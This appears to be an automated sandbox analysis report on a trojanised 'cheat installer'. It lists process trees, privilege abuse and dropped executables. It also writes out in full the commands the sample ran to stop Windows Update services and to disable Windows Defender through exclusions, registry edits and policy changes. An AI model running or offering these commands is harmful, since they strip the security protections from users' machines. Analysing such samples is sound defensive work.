Processes:
pid process 664 664 664 664 664 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exeInstall_YTTCHTs.exedescription pid process Token: SeSecurityPrivilege 4292 msiexec.exe Token: SeCreateTokenPrivilege 4596 Install_YTTCHTs.exe Token: SeAssignPrimaryTokenPrivilege 4596 Install_YTTCHTs.exe Token: SeLockMemoryPrivilege 4596 Install_YTTCHTs.exe Token: SeIncreaseQuotaPrivilege 4596 Install_YTTCHTs.exe Token: SeMachineAccountPrivilege 4596 Install_YTTCHTs.exe Token: SeTcbPrivilege 4596 Install_YTTCHTs.exe Token: SeSecurityPrivilege 4596 Install_YTTCHTs.exe Token: SeTakeOwnershipPrivilege 4596 Install_YTTCHTs.exe Token: SeLoadDriverPrivilege 4596 Install_YTTCHTs.exe Token: SeSystemProfilePrivilege 4596 Install_YTTCHTs.exe Token: SeSystemtimePrivilege 4596 Install_YTTCHTs.exe Token: SeProfSingleProcessPrivilege 4596 Install_YTTCHTs.exe Token: SeIncBasePriorityPrivilege 4596 Install_YTTCHTs.exe Token: SeCreatePagefilePrivilege 4596 Install_YTTCHTs.exe Token: SeCreatePermanentPrivilege 4596 Install_YTTCHTs.exe Token: SeBackupPrivilege 4596 Install_YTTCHTs.exe Token: SeRestorePrivilege 4596 Install_YTTCHTs.exe Token: SeShutdownPrivilege 4596 Install_YTTCHTs.exe Token: SeDebugPrivilege 4596 Install_YTTCHTs.exe Token: SeAuditPrivilege 4596 Install_YTTCHTs.exe Token: SeSystemEnvironmentPrivilege 4596 Install_YTTCHTs.exe Token: SeChangeNotifyPrivilege 4596 Install_YTTCHTs.exe Token: SeRemoteShutdownPrivilege 4596 Install_YTTCHTs.exe Token: SeUndockPrivilege 4596 Install_YTTCHTs.exe Token: SeSyncAgentPrivilege 4596 Install_YTTCHTs.exe Token: SeEnableDelegationPrivilege 4596 Install_YTTCHTs.exe Token: SeManageVolumePrivilege 4596 Install_YTTCHTs.exe Token: SeImpersonatePrivilege 4596 Install_YTTCHTs.exe Token: SeCreateGlobalPrivilege 4596 Install_YTTCHTs.exe Token: SeCreateTokenPrivilege 4596 Install_YTTCHTs.exe Token: SeAssignPrimaryTokenPrivilege 4596 Install_YTTCHTs.exe Token: SeLockMemoryPrivilege 4596 Install_YTTCHTs.exe Token: SeIncreaseQuotaPrivilege 4596 Install_YTTCHTs.exe Token: SeMachineAccountPrivilege 4596 Install_YTTCHTs.exe Token: SeTcbPrivilege 4596 Install_YTTCHTs.exe Token: SeSecurityPrivilege 4596 Install_YTTCHTs.exe Token: SeTakeOwnershipPrivilege 4596 Install_YTTCHTs.exe Token: SeLoadDriverPrivilege 4596 Install_YTTCHTs.exe Token: SeSystemProfilePrivilege 4596 Install_YTTCHTs.exe Token: SeSystemtimePrivilege 4596 Install_YTTCHTs.exe Token: SeProfSingleProcessPrivilege 4596 Install_YTTCHTs.exe Token: SeIncBasePriorityPrivilege 4596 Install_YTTCHTs.exe Token: SeCreatePagefilePrivilege 4596 Install_YTTCHTs.exe Token: SeCreatePermanentPrivilege 4596 Install_YTTCHTs.exe Token: SeBackupPrivilege 4596 Install_YTTCHTs.exe Token: SeRestorePrivilege 4596 Install_YTTCHTs.exe Token: SeShutdownPrivilege 4596 Install_YTTCHTs.exe Token: SeDebugPrivilege 4596 Install_YTTCHTs.exe Token: SeAuditPrivilege 4596 Install_YTTCHTs.exe Token: SeSystemEnvironmentPrivilege 4596 Install_YTTCHTs.exe Token: SeChangeNotifyPrivilege 4596 Install_YTTCHTs.exe Token: SeRemoteShutdownPrivilege 4596 Install_YTTCHTs.exe Token: SeUndockPrivilege 4596 Install_YTTCHTs.exe Token: SeSyncAgentPrivilege 4596 Install_YTTCHTs.exe Token: SeEnableDelegationPrivilege 4596 Install_YTTCHTs.exe Token: SeManageVolumePrivilege 4596 Install_YTTCHTs.exe Token: SeImpersonatePrivilege 4596 Install_YTTCHTs.exe Token: SeCreateGlobalPrivilege 4596 Install_YTTCHTs.exe Token: SeCreateTokenPrivilege 4596 Install_YTTCHTs.exe Token: SeAssignPrimaryTokenPrivilege 4596 Install_YTTCHTs.exe Token: SeLockMemoryPrivilege 4596 Install_YTTCHTs.exe Token: SeIncreaseQuotaPrivilege 4596 Install_YTTCHTs.exe Token: SeMachineAccountPrivilege 4596 Install_YTTCHTs.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Install_YTTCHTs.exepid process 4596 Install_YTTCHTs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
RUN.exemsiexec.exeInstall_YTTCHTs.exeMsiExec.exepowershell.execmd.exedescription pid process target process PID 2948 wrote to memory of 4596 2948 RUN.exe Install_YTTCHTs.exe PID 2948 wrote to memory of 4596 2948 RUN.exe Install_YTTCHTs.exe PID 2948 wrote to memory of 4596 2948 RUN.exe Install_YTTCHTs.exe PID 4292 wrote to memory of 3640 4292 msiexec.exe MsiExec.exe PID 4292 wrote to memory of 3640 4292 msiexec.exe MsiExec.exe PID 4292 wrote to memory of 3640 4292 msiexec.exe MsiExec.exe PID 4596 wrote to memory of 4660 4596 Install_YTTCHTs.exe msiexec.exe PID 4596 wrote to memory of 4660 4596 Install_YTTCHTs.exe msiexec.exe PID 4596 wrote to memory of 4660 4596 Install_YTTCHTs.exe msiexec.exe PID 4292 wrote to memory of 2236 4292 msiexec.exe MsiExec.exe PID 4292 wrote to memory of 2236 4292 msiexec.exe MsiExec.exe PID 4292 wrote to memory of 2236 4292 msiexec.exe MsiExec.exe PID 2236 wrote to memory of 1288 2236 MsiExec.exe powershell.exe PID 2236 wrote to memory of 1288 2236 MsiExec.exe powershell.exe PID 1288 wrote to memory of 1864 1288 powershell.exe cmd.exe PID 1288 wrote to memory of 1864 1288 powershell.exe cmd.exe PID 1864 wrote to memory of 2020 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 2020 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 2020 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4176 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4176 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4176 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4984 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4984 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4984 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4836 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4836 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4836 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 1284 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 1284 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 1284 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4768 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4768 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4768 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 2340 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 2340 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 2340 1864 cmd.exe PING.EXE PID 4292 wrote to memory of 4764 4292 msiexec.exe MsiExec.exe PID 4292 wrote to memory of 4764 4292 msiexec.exe MsiExec.exe PID 4292 wrote to memory of 4764 4292 msiexec.exe MsiExec.exe PID 1864 wrote to memory of 4712 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4712 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4712 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 196 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 196 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 196 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 3940 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 3940 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 3940 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 428 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 428 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 428 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4744 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4744 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 4744 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 2020 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 2020 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 2020 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 3728 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 3728 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 3728 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 5060 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 5060 1864 cmd.exe PING.EXE PID 1864 wrote to memory of 5060 1864 cmd.exe PING.EXE -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3384
-
C:\Users\Admin\AppData\Local\Temp\RUN.exe"C:\Users\Admin\AppData\Local\Temp\RUN.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe.\Install_YTTCHTs.exe3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710551043 " ALLUSERS="1"4⤵PID:4660
-
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3044 -
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exeC:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe3⤵
- Executes dropped EXE
PID:4356 -
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3016 -
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeC:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2328 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b8b216e-be33-47f5-90c9-2ab93a85e4c3.vbs"4⤵PID:5080
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d2090d71-974d-49fa-8cd0-1f8c91a75e56.vbs"4⤵PID:1664
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4940
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2528 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4312 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:544 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:192 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1092 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:552
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2336
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4588
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4428
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4212
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9400D43F3FEAD939D0493164D8F02F07 C2⤵
- Loads dropped DLL
PID:3640 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B525301DA5EA43EE060767E075AFF99A2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss532F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi502E.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr502F.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr52FF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2020 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4176 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4984 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4836 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:1284 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵PID:4768
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2340 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4712 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:196 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3940 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:428 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4744 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2020 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3728 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:5060 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:1068 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:992 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4184 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4304 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵PID:2404
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4652 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵PID:544
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2480 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4132 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:5108 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2360 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2468 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:5068 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:404 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3600 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2328 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2128 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4280 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4252 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4584 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:556 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2360 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:560 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3704 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵PID:2200
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4444 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4476 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4616 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:5116 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:1104 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3460 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵PID:4604
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4996 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵PID:3204
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵PID:4128
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3568 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:1152 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:192 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:1344 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2528 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4952 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4836 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3620 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3116 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:1108 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4476 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3940 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:1652 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2500 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4776 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:212 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵PID:2808
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:3728 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:728 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:992 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:4476 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
PID:2328 -
C:\Windows\SysWOW64\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
PID:1372 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssD2E3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiD2D1.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrD2D2.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrD2D3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4332 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ECC602834DEF073A8D1A51BCDDA0588F E Global\MSI00002⤵
- Loads dropped DLL
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4764 -
C:\Windows\Installer\MSID293.tmp"C:\Windows\Installer\MSID293.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"2⤵
- Executes dropped EXE
PID:1308 -
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"3⤵
- Executes dropped EXE
PID:5004 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D491.tmp\D4A2.tmp\D4A3.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"4⤵PID:2464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:32 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5096 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4716 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:4424
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f5⤵PID:4724
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:232
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:96 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3888 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:212 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:3432
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:4712
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:4700
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:3324
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:8
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵
- Modifies registry class
PID:2444 -
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵
- Modifies registry class
PID:196 -
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:1528
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:4756
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:1960
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2104
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:3204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
